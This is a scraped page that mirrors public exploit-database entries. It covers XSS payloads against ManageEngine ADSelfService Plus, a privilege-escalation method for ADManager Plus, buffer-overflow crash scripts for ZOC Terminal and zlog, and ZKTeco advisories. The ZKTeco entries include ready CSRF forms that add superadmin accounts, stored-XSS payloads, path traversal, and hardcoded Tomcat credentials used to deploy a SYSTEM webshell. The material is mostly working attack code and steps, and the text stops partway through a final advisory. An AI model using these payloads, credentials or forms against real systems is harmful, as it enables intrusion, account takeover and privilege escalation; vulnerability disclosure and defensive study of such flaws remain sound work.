source: https://www.securityfocus.com/bid/50717/info
ZOHO ManageEngine ADSelfService Plus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.5 Build 4521 is vulnerable; other versions may also be affected.
Proof of Concept
===================
Double-Quote String Termination
HTTP Request =
https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"
Response Source View
<script language="javascript">
var searchValue = "';alert(XSS)//\"";
Single-Quote String Termination
Similarly...
HTTP Request
https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=BoB
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863115662
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) Privilege Escalation
# Date: 15th April 2019
# Exploit Author: Digital Interruption
# Vendor Homepage: https://www.manageengine.co.uk/
# Version: 6.6 (Build 6658)
# Tested on: Windows Server 2012 R2
# CVE : CVE-2018-19374
Due to weak permissions setup on the bin, lib and tools directories within the ManageEngine installation directory, it is possible for any authenticated user to modify several core files.
To escalate privileges to that of LOCAL SYSTEM, drop a payload onto the system and then add a line to bin\ChangeJRE.bat to execute it every time the system is rebooted.
# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field erease and Paste ClipBoard
#6.- Click on "Create public/private key files..."
#7.- Crashed
buffer = "\x41" * 2000
f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
f.write(buffer)
f.close()
#Exploit Title: ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select "Shell" field erease the content and Paste ClipBoard
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed
cod = "\x41" * 270
f = open('zoc_sh.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_pkf.py
#2.- Open zoc_pkf.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field erease and Paste ClipBoard
#6.- Click on "Create public/private key files..."
#7.- Crashed
cod = "\x41" * 2000
f = open('zoc_pkf.txt', 'w')
f.write(cod)
f.close()
#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: ZOC Terminal Emulator-v7 Memory Corruption PoC
#[+] Date: 14-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8
#[+] Vendor: http://www.emtec.com
#[+] Download: http://www.emtec.com/downloads/zoc/zoc7051.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
print"###########################################################"
print"# Title: ZOC Terminal Emulator-v7 Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
print"Copy the content of CRASH.TXT in connect to option and set Connection type to Windows Modems"
print" Quick Connection ----> Connection type: Windows Modems ----> connect"
crash= "A" * 200
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed
cod = "\x41" * 20000
f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()
#Exploit Title: ZOC Terminal v7.23.4 - 'Script' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
#2.- Open ZOC Terminal
#3.- Select Script > Start REXX Script...
#4.- Select "exp.zrx" file and click "open"
#5.- Crashed
cod = "\x41" * 20000
f = open('exp.zrx', 'w')
f.write(cod)
f.close()
"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi
# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""
#!/usr/bin/python
filename="zoc.txt"
buffer = "\x41" * 97
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: zlog 1.2.15 - Buffer Overflow
# Date: 10/23/2021
# Exploit Author: LIWEI
# Vendor Homepage: https://github.com/HardySimpson/zlog
# Software Link: https://github.com/HardySimpson/zlog
# Version: v1.2.15
# Tested on: ubuntu 18.04.2
# 1.- compile the zlogv1.2.15 code to a library.
# 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below.
# 3.- crash. because it made a stack-buffer-overflow READ.
# 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20".
# 5.- Here are the crash backtrace.
#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15
#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7
#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18
#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6
#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18
And also my testcase:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "zlog.h"
int
LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
char filename[256];
sprintf(filename, "/tmp/libfuzzer.%d", getpid());
FILE *fp = fopen(filename, "wb");
if (!fp)
return 0;
fwrite(data, size, 1, fp);
fclose(fp);
int rc = zlog_init(filename);
if (rc == 0)
{
zlog_fini();
}
unlink(filename);
remove(filename);
return 0;
}
Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++"
Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it.
Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
CVE-ID: CVE-2017-14680
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The Application is a time attendance software which allows users to
download their time and attendance data from the application in a PDF
Format. The data includes their employee’s id, user-id, gender,
birth-dates, phone numbers and access-areas. These PDF Files however are
not properly authenticated. If any user get access to the file-download
link, he can go ahead and download these files directly without any
authentication.
Proof of Concept Links:
1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144237.pdf>
2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144238.pdf>
3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144239.pdf>
Impact:
Personal details pertaining to the employees of the company are disclosed
without their permissions. This leads to violation of user privacy.
Moreover the information available can be used to mount further attacks.
References:
http://seclists.org/fulldisclosure/2017/Sep/39
http://seclists.org/bugtraq/2017/Sep/20
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
CVE-ID: CVE-2017-13129
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The ZKTime Web Software allows the Administrator to elevate the privileges
of the application user by simple click of a radio button namely
"superuser". However when the request is generated there are no random
tokens attached to this request to prevent any kind of Cross Site Request
Forgery attacks. Moreover there no other protections (like administrator
password verification etc.) mechanisms in place to block any kind of forged
requests.
An Attacker takes advantage of this scenario and creates a crafted link to
add himself as an administrator to the ZKTime Web Software. He then uses
social engineering methods to trick the administrator into click the forged
http request. The request is executed and the attacker becomes the
Administrator of the
ZKTime Web Software.
Proof of Concept Code:
Forged HTTP Request used by the attacker:
<html>
<body>
<form action="http://XX.XX.XX.46:8081/data/auth/User/14/
<http://xx.xx.xx.46:8081/data/auth/User/14/>" method="POST">
<input type="hidden" name="pk" value="" />
<input type="hidden" name="username" value="Pentestuser1" />
<input type="hidden" name="Password" value="" />
<input type="hidden" name="ResetPassword" value="" />
<input type="hidden" name="fpidnum" value="" />
<input type="hidden" name="fpcount" value="0" />
<input type="hidden" name="tlng" value="en" />
<input type="hidden" name="first_name" value="Pentest" />
<input type="hidden" name="last_name" value="User" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="is_staff" value="on" />
<input type="hidden" name="is_superuser" value="on" />
<input type="hidden" name="last_login" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-last_login" value="2017-08-20
14:14:34" />
<input type="hidden" name="date_joined" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-date_joined" value="2017-08-20
14:14:34" />
<input type="hidden" name="finnger" value="" />
<input type="hidden" name="template" value="" />
<input type="hidden" name="finger10" value="" />
<input type="hidden" name="template10" value="" />
<input type="hidden" name="delfp" value="" />
<input type="hidden" name="actflag" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact:
If the vulnerability is successfully exploited than an attacker (who would
be a normal user of the web application) can escalate his privileges and
become the administrator of ZK Time Web Software.
References:
http://seclists.org/fulldisclosure/2017/Sep/38
http://seclists.org/bugtraq/2017/Sep/19
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
3.0.1.5 (160622)
3.0.1.1 (160216)
Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.
Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'C' flag (Change) for 'Everyone' group, making the
entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php
18.07.2016
--
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
Everyone Change [RWXD]
NT SERVICE\TrustedInstaller Special Access [A]
NT AUTHORITY\SYSTEM Special Access [A]
BUILTIN\Administrators Special Access [A]
BUILTIN\Users Special Access [RX]
CREATOR OWNER Special Access [A]
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
Everyone Change [RWXD]
C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.
Ref: https://www.exploit-db.com/exploits/31433/
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php
18.07.2016
--
Contents of tomcat-users.xml:
-----------------------------
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:
<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>
</tomcat-users>
-----------------------------
Open Manager application and login:
-----------------------------------
http://127.0.0.1:8088/manager (zkteco:zkt123)
Deploy JSP webshell, issue command:
-----------------------------------
- Request: whoami
- Response: nt authority\system
call the findConnectors() method of the Service use:
----------------------------------------------------
http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
Response:
OK - Operation findConnectors returned:
Connector[HTTP/1.1-8088]
Connector[AJP/1.3-8019]
List of all loaded servlets:
----------------------------
http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
18.07.2016
--
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
<!--
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
<input type="hidden" name="authUser.username" value="thricer" />
<input type="hidden" name="authUser.loginPwd" value="111111" />
<input type="hidden" name="repassword" value="111111" />
<input type="hidden" name="authUser.isActive" value="true" />
<input type="hidden" name="authUser.isSuperuser" value="true" />
<input type="hidden" name="groupIds" value="1" />
<input type="hidden" name="deptIds" value="1" />
<input type="hidden" name="areaIds" value="1" />
<input type="hidden" name="authUser.email" value="lab@zeroscience.mk" />
<input type="hidden" name="authUser.name" value="test" />
<input type="hidden" name="authUser.lastName" value="lasttest" />
<input type="hidden" name="fingerTemplate" value=" " />
<input type="hidden" name="fingerId" value=" " />
<input type="hidden" name="logMethod" value="add" />
<input type="hidden" name="un" value="1471451964349_2769" />
<input type="hidden" name="systemCode" value="base" />
<input type="submit" value="Go" />
</form>
</body>
</html>
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.
Desc: The issue exist due to the way visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
username value with the password '123456' to authenticate and disclose sensitive
information and/or do unauthorized actions.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
18.07.2016
--
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------
1: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
2: <%@page import="com.zk.common.util.EnvironmentUtil"%>
3: <%
4: String path = request.getContextPath();
5: String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
6:
7: String ip= EnvironmentUtil.getClientIp(request);
8: if("0:0:0:0:0:0:0:1".equals(ip))
9: {
10: ip = "127.0.0.1";
11: }
12:
13: %>
14: <jsp:include page="login.jsp"/>
15: <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
16:
17: <script>
18: function autoLogin()
19: {
20: $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
21: $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
22: var ip = "<%=ip%>";
23: $("#userLoginForm input[name='username']").val(ip);
24: $("#userLoginForm input[name='password']").val("123456");
25: $('#userLoginForm').submit();
26: }
27: window.onload=autoLogin;
28: </script>
---------------------------------------------------------------------------------
<!--
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252
Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: CherryPy/3.1.0beta3 WSGI Server
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
Python 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
18.07.2016
-->
<html>
<body>
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
<input type="hidden" name="pk" value="None" />
<input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" />
<input type="hidden" name="holiday_type" value="1" />
<input type="hidden" name="start_date" value="09/13/2016" />
<input type="hidden" name="end_date" value="10/18/2016" />
<input type="hidden" name="loop_by_year" value="2" />
<input type="hidden" name="memo" value=""><script>alert(2)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)
Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.
Desc: ZKAccess suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
group.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php
18.07.2016
--
C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
# Exploit Author: RedTeam Pentesting GmbH
# CVE: CVE-2022-42953
Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface
The ZKTeco time attendance device does not require authentication to use the
web interface, exposing the database of employees and their credentials.
Details
=======
Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
